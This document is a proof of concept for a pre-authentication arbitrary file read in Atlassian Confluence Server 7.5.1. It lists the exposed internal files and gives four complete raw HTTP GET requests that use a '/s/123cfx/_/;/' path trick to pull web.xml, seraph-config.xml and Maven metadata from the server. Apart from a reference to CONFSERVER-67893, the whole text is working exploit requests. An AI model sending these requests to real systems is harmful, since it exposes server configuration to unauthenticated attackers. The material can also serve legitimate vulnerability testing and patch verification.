Atlassian Confluence Server 7.5.1 Pre-Authorization Arbitrary File Read vulnerability POC
Vulnerable Endpoints:
WEB-INF/web.xml
WEB-INF/decorators.xml
WEB-INF/classes/seraph-config.xml
META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
POC #1 - web.xml
GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC #2 - seraph-config.xml
GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC #3 - pom.properties
GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC #4 - pom.xml
GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
- For more information related to this vulnerability please refer to CONFSERVER-67893